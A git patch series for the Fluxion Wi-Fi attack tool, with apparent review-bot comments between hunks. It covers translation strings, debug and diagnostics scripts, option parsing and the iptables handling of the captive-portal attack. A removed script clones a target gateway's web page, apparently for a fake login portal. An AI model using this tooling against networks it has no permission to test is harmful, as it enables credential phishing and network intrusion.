@@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Geben sie den absoluten Pfad ein" FLUXIONScannerChannelQuery="Wähle deinen Netzwerkfrequenz aus" FLUXIONScannerChannelOptionAll="Alle Netzwerkfrequenzen" FLUXIONScannerChannelOptionSpecific="Spezifische Frequenz(en)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Einzelne Frequenz" FLUXIONScannerChannelMiltipleTip="Mehrere Frequenzen" diff --git a/language/el.sh b/language/el.sh index acca561..010cda0 100755 --- a/language/el.sh +++ b/language/el.sh @@ -35,6 +35,7 @@ FLUXIONAbsolutePathInfo="Εισαγετε διαδρομή αρχειου" FLUXIONScannerChannelQuery="Επίλεξτε κανάλι" FLUXIONScannerChannelOptionAll="Όλα τα κανάλια" FLUXIONScannerChannelOptionSpecific="Συγκεκριμένο(α) κανάλι(α)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelSingleTip="Ενα κανάλι" FLUXIONScannerChannelMiltipleTip="Πολλαπλά κανάλια" diff --git a/language/en.sh b/language/en.sh index 8774b2f..40b64d1 100755 --- a/language/en.sh +++ b/language/en.sh @@ -71,6 +71,7 @@ FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}un FLUXIONAttackQuery="Select a wireless attack for the access point" FLUXIONAttackInProgressNotice="${CCyn}\$FluxionAttack$CClr attack in progress..." FLUXIONSelectAnotherAttackOption="Select another attack" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONGeneralSkipOption="${CYel}Skip" FLUXIONGeneralBackOption="${CRed}Back" diff --git a/language/es.sh b/language/es.sh index 81e2faa..a2d0142 100755 --- a/language/es.sh +++ b/language/es.sh 
@@ -44,6 +44,7 @@ FLUXIONScannerHeader="FLUXION Escáner" FLUXIONAPServiceQuery="Seleccione Opción de Ataque" FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recomendado$CClr)" FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Conexión más lenta$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Select a method to retrieve the handshake" FLUXIONHashSourcePathOption="Path to capture file" diff --git a/language/fr.sh b/language/fr.sh index c8a7a09..88156b8 100755 --- a/language/fr.sh +++ b/language/fr.sh @@ -44,6 +44,7 @@ FLUXIONScannerHeader="Scanner FLUXION" FLUXIONAPServiceQuery="Sélectionnez une option d'attaque" FLUXIONAPServiceHostapdOption="Rogue AP - hostapd (${CGrn}recommandé$CClr)" FLUXIONAPServiceAirbaseOption="Rogue AP - airbase-ng (${CYel}Connexion plus lente$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashSourceQuery="Sélectionnez une méthode de récupération de handshake" FLUXIONHashSourcePathOption="Chemin du fichier capturé" diff --git a/language/it.sh b/language/it.sh index 42d2a15..57fba2d 100755 --- a/language/it.sh +++ b/language/it.sh @@ -53,6 +53,7 @@ FLUXIONUseFoundHashQuery="Vuoi usare questo file?" FLUXIONHashVerificationMethodQuery="Seleziona il metodo di verifica dell'hash" FLUXIONHashVerificationMethodPyritOption="pyrit verification (${CGrn}raccomandato$CClr)" FLUXIONHashVerificationMethodAircrackOption="aircrack-ng verification (${CYel}inaffidabile$CClr)" +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONAttackQuery="Seleziona la tua scelta" FLUXIONAttackInProgressNotice="${CCyn}\$FLUXIONAttack$CClr attacco in corso..." diff --git a/language/pl.sh b/language/pl.sh index b709a78..f8a08a9 100644 --- a/language/pl.sh +++ b/language/pl.sh 
@@ -31,6 +31,7 @@ FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" FLUXIONHashValidNotice="${CGrn}Success$CClr, hash verification completed!" FLUXIONPathToHandshakeFileQuery="Podaj ścieżkę dostępu do pliku handshake $CClr(Example: /.../dump-01.cap)" FLUXIONAbsolutePathInfo="Absolute path" +FluxionRestartOption="Restart"s # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONScannerChannelQuery="Wybierz kanał do monitorowania" FLUXIONScannerChannelOptionAll="Wszystkie kanały" diff --git a/language/pt-br.sh b/language/pt-br.sh index 64e01e3..4b31b86 100755 --- a/language/pt-br.sh +++ b/language/pt-br.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Sintetizando os resultados da varredura, aguarde..." FLUXIONScannerFailedNotice="Wireless card não suportado (sem APs encontrados)" FLUXIONScannerDetectedNothingNotice="Sem APs encontrados, retornando..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Arquivo hash não existe!" FLUXIONHashInvalidError="${CRed}Error$CClr, arquivo hash inválido!" diff --git a/language/ro.sh b/language/ro.sh index f60074c..23495b6 100755 --- a/language/ro.sh +++ b/language/ro.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" 
diff --git a/language/sk.sh b/language/sk.sh index 9cf48e6..e2663d7 100644 --- a/language/sk.sh +++ b/language/sk.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Päť sekúnd po objavení sa cieľového AP, zavrite FLUXIONPreparingScannerResultsNotice="Výsledky scanu sa pripravujú, čakajte..." FLUXIONScannerFailedNotice="Bezdrôtová sieťová karta nemusí byť podporovaná (nenašli sa žiadne AP)" FLUXIONScannerDetectedNothingNotice="Žiadne prístupové body neboli najdené, vraciam sa..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Súbor 'hash' neexistuje!" FLUXIONHashInvalidError="${CRed}Error$CClr, nesprávny 'hash' súbor!" diff --git a/language/sl.sh b/language/sl.sh index 7749eea..4838b1f 100755 --- a/language/sl.sh +++ b/language/sl.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/tk.sh b/language/tk.sh index 6669584..781417b 100755 --- a/language/tk.sh +++ b/language/tk.sh 
@@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="Synthesizing scan results, please wait..." FLUXIONScannerFailedNotice="Wireless card may not be supported (no APs found)" FLUXIONScannerDetectedNothingNotice="No access points were detected, returning..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash file does not exist!" FLUXIONHashInvalidError="${CRed}Error$CClr, invalid hash file!" diff --git a/language/zh.sh b/language/zh.sh index 64d1cac..8f1da14 100755 --- a/language/zh.sh +++ b/language/zh.sh @@ -25,6 +25,7 @@ FLUXIONStartingScannerTip="Five seconds after the target AP appears, close the F FLUXIONPreparingScannerResultsNotice="综合扫描的结果获取中,请稍等..." FLUXIONScannerFailedNotice="你的无线网卡好像不支持 (没有发现APs)" FLUXIONScannerDetectedNothingNotice="没有发现访问点, 请返回重试..." +FluxionRestartOption="Restart" # >>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>>> FLUXIONHashFileDoesNotExistError="Hash文件不存在!" FLUXIONHashInvalidError="${CRed}错误$CClr, 无效的Hash文件!" diff --git a/scripts/debug.sh b/scripts/debug.sh index 8ecf4b3..cd4d8a1 100755 --- a/scripts/debug.sh +++ b/scripts/debug.sh @@ -1,4 +1,6 @@ #!/ bin / bash -export FLUXIONDebug = 1 export FLUXIONWIKillProcesses = - 1 export FLUXIONWIReloadDriver = 1 +# These are the debug flags used by the script +export FLUXIONDebug=1 +export FLUXIONWIKillProcesses=1 +export FLUXIONWIReloadDriver=1 diff --git a/scripts/diagnostics.sh b/scripts/diagnostics.sh index 4439d5f..f766015 100755 --- a/scripts/diagnostics.sh +++ b/scripts/diagnostics.sh 
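Review bot: In the `scripts/debug.sh` hunk the context line `#!/ bin / bash` is left as it is, so the shebang is still not a valid interpreter path while the exports below it are repaired; it should read `#!/bin/bash`. The rewrite also changes `FLUXIONWIKillProcesses` from what looks like a mangled `-1` to `1`. If the old value was intentional, that is a behaviour change that deserves a word in the commit message.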
@@ -1,66 +1,89 @@ #!/bin/bash -if [ -d "lib" ]; then source lib/InterfaceUtils.sh -elif [ -d "../lib" ]; then source ../lib/InterfaceUtils.sh +clear +declare -r HEADER_SIZE="####" + +# Diagnostic script + +if [ -d "lib" ];then + source lib/InterfaceUtils.sh +elif [ -d "../lib" ];then + source ../lib/InterfaceUtils.sh else - echo "YOU MUST EXECUTE THIS SCRIPT FROM FLUXION'S ROOT!" + echo -e "\033[31mError lib folder not found\033[0m" exit 1 fi if [ ! "$1" ]; then - echo "Usage ./scripts/diagnostics " + echo "Usage ./scripts/diagnostics [wireless_interface]" exit 1 fi -echo "[ FLUXION Info ]" -if [ -f "./fluxion.sh" ] - then declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion.sh)) - else declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion.sh)) +echo "$HEADER_SIZE FLUXION Info" +if [ -f "fluxion" ];then + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" fluxion)) +else + declare -r FLUXIONInfo=($(grep -oE "FLUXION(Version|Revision)=[0-9]+" ../fluxion)) fi echo "FLUXION V${FLUXIONInfo[0]/*=/}.${FLUXIONInfo[1]/*=/}" echo -ne "\n\n" -echo "[ BASH Info ]" +echo "$HEADER_SIZE BASH Info " bash --version -echo "Path: $(ls -L $(which bash))" +echo "**Path:** $(ls -L $(which bash))" echo -ne "\n\n" -echo "[ Interface ($1) Info ]" -if interface_physical "$1"; then echo "Device: $InterfacePhysical" -else echo "Device: Unknown" +echo "$HEADER_SIZE Interface ($1) Info " +if interface_physical "$1";then + echo "**Device**: $InterfacePhysical" +else + echo "**Device:** Unknown" fi -if interface_driver "$1"; then echo "Driver: $InterfaceDriver" -else echo "Driver: Unsupported" +if interface_driver "$1";then + echo "**Driver:** $InterfaceDriver" +else + echo "**Driver:** Unsupported" fi -if interface_chipset "$1"; then echo "Chipset: $InterfaceChipset" -else echo "Chipset: Unknown" +if interface_chipset "$1";then + echo "**Chipset:** $InterfaceChipset" +else + echo "**Chipset:** Unknown" fi -echo -n "Injection 
Test: " -aireplay-ng --test "$1" | grep -oE "Injection is working!|No Answer..." || echo "failed" +if iw list | grep monitor | head -n 1 | tail -n 1 &>/dev/null;then + echo "**Master Modes** Yes" +else + echo "**Master Modes** No" +fi + +echo -n "**Injection Test:** " +aireplay-ng --test "$1" | grep -oE "Injection is working!|No Answer..." || echo -e "\033[31mFailed\033[0m" echo -ne "\n\n" -echo "[ XTerm Info ]" -echo "Version: $(xterm -version)" -echo "Path: $(ls -L $(which xterm))" +echo "$HEADER_SIZE XTerm Infos" +echo "**Version:** $(xterm -version)" +echo "**Path:** $(ls -L $(which xterm))" echo -n "Test: " if xterm -hold -fg "#FFFFFF" -bg "#000000" -title "XServer/XTerm Test" -e "echo \"XServer/XTerm test: close window to continue...\"" &>/dev/null; then echo "XServer/XTerm success!" -else echo "XServer/XTerm failure!" +else + echo -e "\033[31m XServer/XTerm failure!\033[0m" fi echo -ne "\n\n" -echo "[ HostAPD Info ]" +echo "$HEADER_SIZE HostAPD Info" hostapd -v echo "Path: $(ls -L $(which hostapd))" echo -ne "\n\n" -echo "[ Aircrack-ng Info ]" +echo "$HEADER_SIZE Aircrack-ng Info" aircrack-ng -H | head -n 4 -echo -ne "\n\n" +echo -ne "\n" -echo "[ System Info ]" -if [ -r "/proc/version" ]; then cat /proc/version -else uname -r +echo "$HEADER_SIZE System Info" +if [ -r "/proc/version" ]; then + echo "**Chipset:** $(cat /proc/version)" +else + echo "**Chipset:** $(uname -r)" fi diff --git a/scripts/router.sh b/scripts/router.sh deleted file mode 100755 index 0489105..0000000 --- a/scripts/router.sh +++ /dev/null 
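Review bot: The added probe `if iw list | grep monitor | head -n 1 | tail -n 1 &>/dev/null` always takes the "Yes" branch. No `set -o pipefail` is visible in this script, so the `if` sees only the exit status of `tail`, which is 0 on empty input too. `if iw list | grep -q monitor; then` tests what was intended. The branch labels say "Master Modes" although the pattern is `monitor`, and `iw list` covers every adapter rather than the `$1` interface being diagnosed. Further down, the System Info block prints the kernel version under a `**Chipset:**` label.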
@@ -1,70 +0,0 @@ -#!/bin/bash - -##################################### < CONFIGURATION > ##################################### - -gateway=$(ip route | grep default | awk '{print $3}') - -#Colors -white="\033[1;37m" -red="\033[1;31m" -blue="\033[1;34m" -transparent="\e[0m" - -############################################################################################# - -clear -echo -e "$red[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]" -echo -e "$red Prepare router page." -echo -e "$blue[~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~]""$transparent" -echo "[i] Prepare dep." - -# Check which package manager is installed -echo "Package Manager" -if hash pacman 2>/dev/null; then - PACK="pacman -S" -else - if hash apt-get 2>/dev/null; then - PACK="apt-get install" - else - if hash yum 2>/dev/null; then - PACK="yum install" - fi - fi -fi -sleep 0.025 -echo "=================================================================================" - -echo -ne "Httrack........." -if ! hash httrack 2>/dev/null; then - echo -e "\e[1;31mNot installed"$transparent"" - $PACK httrack -else - echo -e "\e[1;32mOK!"$transparent"" -fi -sleep 0.025 -echo "=================================================================================" - -echo -ne "cutycapt........" -if ! hash httrack 2>/dev/null; then - echo -e "\e[1;31mNot installed"$transparent"" - $PACK cutycapt -else - echo -e "\e[1;32mOK!"$transparent"" -fi -sleep 0.025 -echo "=================================================================================" - -if [ ! 
-d sites ]; then - mkdir sites -fi - -############################################################################################# -echo "[i] Download preview picture" -cutycapt --url=http://$gateway --out=sites/$(date | awk '{print $4}').png -echo "=================================================================================" - -cd sites -echo "[i] Download router site" -httrack $gateway -echo "=================================================================================" -echo "[I] DONE" From d1a5d666f4982e6e08d5c5d489230afc08e85d04 Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Wed, 31 Jan 2018 13:20:33 +0100 Subject: [PATCH 38/45] Fix #364 --- attacks/Captive Portal/attack.sh | 2 -- fluxion | 2 ++ 2 files changed, 2 insertions(+), 2 deletions(-) diff --git a/attacks/Captive Portal/attack.sh b/attacks/Captive Portal/attack.sh index 1696c66..3f8d2ee 100755 --- a/attacks/Captive Portal/attack.sh +++ b/attacks/Captive Portal/attack.sh @@ -1090,8 +1090,6 @@ captive_portal_set_routes() { # Activate system IPV4 packet routing/forwarding. sysctl -w net.ipv4.ip_forward=1 &>$FLUXIONOutputDevice - iptables-save >"$FLUXIONWorkspacePath/iptables-rules" - iptables --flush iptables --table nat --flush iptables --delete-chain diff --git a/fluxion b/fluxion index 13180a5..a93b14a 100755 --- a/fluxion +++ b/fluxion @@ -202,6 +202,8 @@ source "$FLUXIONPath/language/en.sh" fluxion_startup() { if [ "$FLUXIONDebug" ]; then return 1; fi + # Make sure that we save the iptable files + iptables-save >"$FLUXIONWorkspacePath/iptables-rules" local banner=() format_center_literals \ From ec094539b4e1fa5fd22e1ef83392f143f0835a6c Mon Sep 17 00:00:00 2001 From: Erik Dubois Date: Wed, 31 Jan 2018 13:53:13 +0100 Subject: [PATCH 39/45] Change preference file --- fluxion | 117 ++++++++++++++++++++++--------------------- preferences/.gitkeep | 0 2 files changed, 60 insertions(+), 57 deletions(-) create mode 100644 preferences/.gitkeep 
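Review bot: In the fluxion hunk the added `iptables-save >"$FLUXIONWorkspacePath/iptables-rules"` sits below `if [ "$FLUXIONDebug" ]; then return 1; fi`, so a debug run never takes the backup, while captive_portal_set_routes (the other hunk of this commit) still flushes the tables. The result of the save is not checked either, so a failed or empty dump goes unnoticed until the rules are needed again. Moving the line above the early return and reporting a failure, for example `iptables-save >"$FLUXIONWorkspacePath/iptables-rules" || echo "iptables backup failed" >&2`, covers both cases. The target is a fixed name under /tmp written as root; whether the workspace directory already exists with safe ownership at this point cannot be seen from the hunk. fluxion_startup continues past the hunk.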
diff --git a/fluxion b/fluxion index a93b14a..72594ff 100755 --- a/fluxion +++ b/fluxion @@ -8,21 +8,24 @@ # the script, however, will be loaded correctly. # Path to directory containing the FLUXION executable script. -declare -r FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) +readonly FLUXIONPath=$(cd "$(dirname "$0")"; pwd -P) # Path to the temp. directory available to FLUXION & subscripts. -declare -r FLUXIONWorkspacePath="/tmp/fluxspace" +readonly FLUXIONWorkspacePath="/tmp/fluxspace" # Path to FLUXION's preferences file, to be loaded afterward. -declare -r FLUXIONPreferencesFile="$FLUXIONPath/preferences.conf" +readonly FLUXIONLanguagePreferencesFile="$FLUXIONPath/preferences/LanguagePreference.conf" # Constants denoting the reference noise floor & ceiling levels. # These are used by the the wireless network scanner visualizer. -declare -r FLUXIONNoiseFloor=-90 -declare -r FLUXIONNoiseCeiling=-60 +readonly FLUXIONNoiseFloor=-90 +readonly FLUXIONNoiseCeiling=-60 -declare -r FLUXIONVersion=4 -declare -r FLUXIONRevision=1 +readonly FLUXIONVersion=4 +readonly FLUXIONRevision=2 + +# Declare window ration bigger = smaller windows +FLUXIONWindowRatio=4 # ============================================================ # 
@@ -79,14 +82,14 @@ source lib/HashUtils.sh # ============================================================ # if ! FLUXIONCLIArguments=$( getopt --options="vdkrnmtb:e:c:l:a:" \ - --longoptions="debug,version,killer,reloader,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ + --longoptions="debug,version,killer,reloader,ratio,airmon-ng,multiplexer,target,test,bssid:,essid:,channel:,language:,attack:" \ --name="FLUXION V$FLUXIONVersion.$FLUXIONRevision" -- "$@" ); then echo -e "${CRed}Aborted$CClr, parameter error detected..."; exit 5 fi AttackCLIArguments=${FLUXIONCLIArguments##*--} -declare -r FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} +readonly FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============================================================ # @@ -96,17 +99,18 @@ declare -r FLUXIONCLIArguments=${FLUXIONCLIArguments%%--*} # ============= < Argument Loaded Configurables > ============ # eval set -- "$FLUXIONCLIArguments" # Set environment parameters. -[ "$1" != "" ] && declare -r FLUXIONAuto=1 # Auto-mode if using CLI. +#[ "$1" != "" ] && readonly FLUXIONAuto=1 # Auto-mode if using CLI. while [ "$1" != "" -a "$1" != "--" ]; do case "$1" in -v|--version) echo "FLUXION V$FLUXIONVersion.$FLUXIONRevision"; exit;; - -d|--debug) declare -r FLUXIONDebug=1;; - -k|--killer) declare -r FLUXIONWIKillProcesses=1;; - -r|--reloader) declare -r FLUXIONWIReloadDriver=1;; - -n|--airmon-ng) declare -r FLUXIONAirmonNG=1;; - -m|--multiplexer) declare -r FLUXIONTMux=1;; + -d|--debug) readonly FLUXIONDebug=1;; + -k|--killer) readonly FLUXIONWIKillProcesses=1;; + -r|--reloader) readonly FLUXIONWIReloadDriver=1;; + -n|--airmon-ng) readonly FLUXIONAirmonNG=1;; + -m|--multiplexer) readonly FLUXIONTMux=1;; -b|--bssid) FluxionTargetMAC=$2; shift;; + --ratio) FLUXIONWindowRatio=$2;shift;; -e|--essid) FluxionTargetSSID=$2; FluxionTargetSSIDClean=$( echo "$FluxionTargetSSID" | sed -r 's/( |\/|\.|\~|\\)+/_/g' 
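Review bot: `ratio` is added to `--longoptions` without a trailing colon, yet the arm added in the next hunk, `--ratio) FLUXIONWindowRatio=$2;shift;;`, consumes an argument. getopt will treat `--ratio` as a plain flag and move its value to the non-option arguments, so the arm stores and shifts away whatever token follows instead. Declare it as `ratio:`. The value is later used as a divisor in fluxion_set_resolution, so it should be checked before it is stored, for example `[[ $2 =~ ^[1-9][0-9]*$ ]] || exit 5`, matching the parameter-error exit code used just above.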
@@ -126,67 +130,67 @@ shift # Remove "--" to prepare for attacks to read parameters. # Load user-defined preferences if there's an executable script. # If no script exists, prepare one for the user to store config. # WARNING: Preferences file must assure no redeclared constants. -if [ -x "$FLUXIONPreferencesFile" ]; then - source "$FLUXIONPreferencesFile" +if [ -x "$FLUXIONLanguagePreferencesFile" ]; then + source "$FLUXIONLanguagePreferencesFile" else - echo '#!/bin/bash' > "$FLUXIONPreferencesFile" - chmod u+x "$FLUXIONPreferencesFile" + echo '#!/bin/bash' > "$FLUXIONLanguagePreferencesFile" + chmod u+x "$FLUXIONLanguagePreferencesFile" fi # ================ < Configurable Constants > ================ # if [ "$FLUXIONAuto" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONAuto=${FLUXIONAuto:+1} + readonly FLUXIONAuto=${FLUXIONAuto:+1} fi if [ "$FLUXIONDebug" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONDebug=${FLUXIONDebug:+1} + readonly FLUXIONDebug=${FLUXIONDebug:+1} fi if [ "$FLUXIONAirmonNG" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} + readonly FLUXIONAirmonNG=${FLUXIONAirmonNG:+1} fi if [ "$FLUXIONWIKillProcesses" != "1" ]; then # If defined, assure 1. - declare -r FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} + readonly FLUXIONWIKillProcesses=${FLUXIONWIKillProcesses:+1} fi if [ "$FLUXIONWIReloadDriver" != "1" ]; then # If defined, assure 1. 
- declare -r FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} + readonly FLUXIONWIReloadDriver=${FLUXIONWIReloadDriver:+1} fi # FLUXIONDebug [Normal Mode "" / Developer Mode 1] if [ $FLUXIONDebug ]; then - declare -r FLUXIONOutputDevice="/dev/stdout" - declare -r FLUXIONHoldXterm="-hold" + readonly FLUXIONOutputDevice="/dev/stdout" + readonly FLUXIONHoldXterm="-hold" else - declare -r FLUXIONOutputDevice="/dev/null" - declare -r FLUXIONHoldXterm="" + readonly FLUXIONOutputDevice="/dev/null" + readonly FLUXIONHoldXterm="" fi # ================ < Configurable Variables > ================ # -declare -r FLUXIONPromptDefault="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " +readonly FLUXIONPromptDefault="$CRed[${CSBlu}fluxion$CSYel@$CSWht$HOSTNAME$CClr$CRed]-[$CSYel~$CClr$CRed]$CClr " FLUXIONPrompt=$FLUXIONPromptDefault -declare -r FLUXIONVLineDefault="$CRed[$CSYel*$CClr$CRed]$CClr" +readonly FLUXIONVLineDefault="$CRed[$CSYel*$CClr$CRed]$CClr" FLUXIONVLine=$FLUXIONVLineDefault # ================== < Library Parameters > ================== # -declare -r InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" +readonly InterfaceUtilsOutputDevice="$FLUXIONOutputDevice" -declare -r SandboxWorkspacePath="$FLUXIONWorkspacePath" -declare -r SandboxOutputDevice="$FLUXIONOutputDevice" +readonly SandboxWorkspacePath="$FLUXIONWorkspacePath" +readonly SandboxOutputDevice="$FLUXIONOutputDevice" -declare -r InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" -declare -r InstallerUtilsOutputDevice="$FLUXIONOutputDevice" -declare -r InstallerUtilsNoticeMark="$FLUXIONVLine" +readonly InstallerUtilsWorkspacePath="$FLUXIONWorkspacePath" +readonly InstallerUtilsOutputDevice="$FLUXIONOutputDevice" +readonly InstallerUtilsNoticeMark="$FLUXIONVLine" -declare -r PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" +readonly PackageManagerLog="$InstallerUtilsWorkspacePath/package_manager.log" declare IOUtilsHeader="fluxion_header" -declare -r 
IOUtilsQueryMark="$FLUXIONVLine" -declare -r IOUtilsPrompt="$FLUXIONPrompt" +readonly IOUtilsQueryMark="$FLUXIONVLine" +readonly IOUtilsPrompt="$FLUXIONPrompt" -declare -r HashOutputDevice="$FLUXIONOutputDevice" +readonly HashOutputDevice="$FLUXIONOutputDevice" # ============================================================ # 
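Review bot: The preferences block in the hunk at -126 still runs `source "$FLUXIONLanguagePreferencesFile"` as root, although, going by the new name and by fluxion_set_language later in this patch, the file holds a single `FluxionLanguage=` line. Anything else that ends up in that file is executed with full privileges at every start. Reading the one key instead of executing the file removes that exposure, for example `FluxionLanguage=$(sed -n 's/^FluxionLanguage=\([A-Za-z_]*\)$/\1/p' "$FLUXIONLanguagePreferencesFile" | tail -n 1)`, with the character class adjusted to the language file names. The `-x` test and the `chmod u+x` in the else branch are then no longer needed.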
@@ -418,30 +422,29 @@ trap fluxion_handle_exit SIGINT SIGHUP # =============== < Resolution & Positioning > =============== # # ============================================================ # fluxion_set_resolution() { # Windows + Resolution - # Calc options - RATIO=4 - # Get demensions + # Get dimensions SCREEN_SIZE=$(xdpyinfo | grep dimension | awk '{print $4}' | tr -d "(") SCREEN_SIZE_X=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $1}')) SCREEN_SIZE_Y=$(printf '%.*f\n' 0 $(echo $SCREEN_SIZE | sed -e s'/x/ /'g | awk '{print $2}')) + # Calculate proportional windows PROPOTION=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$SCREEN_SIZE_Y}")/1 | bc) - NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$RATIO}")/1 | bc) + NEW_SCREEN_SIZE_X=$(echo $(awk "BEGIN {print $SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_Y=$(echo $(awk "BEGIN {print $SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) - NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$RATIO}")/1 | bc) - NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$RATIO}")/1 | bc) + NEW_SCREEN_SIZE_BIG_X=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_X/$FLUXIONWindowRatio}")/1 | bc) + NEW_SCREEN_SIZE_BIG_Y=$(echo $(awk "BEGIN {print 1.5*$SCREEN_SIZE_Y/$FLUXIONWindowRatio}")/1 | bc) SCREEN_SIZE_MID_X=$(echo $(($SCREEN_SIZE_X + ($SCREEN_SIZE_X - 2 * $NEW_SCREEN_SIZE_X) / 2))) SCREEN_SIZE_MID_Y=$(echo $(($SCREEN_SIZE_Y + ($SCREEN_SIZE_Y - 2 * $NEW_SCREEN_SIZE_Y) / 2))) - # Upper + # Upper windows TOPLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0+0" TOPRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0+0" TOP="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+$SCREEN_SIZE_MID_X+0" - # Lower + # Lower windows BOTTOMLEFT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y+0-0" BOTTOMRIGHT="-geometry $NEW_SCREEN_SIZE_Xx$NEW_SCREEN_SIZE_Y-0-0" BOTTOM="-geometry 
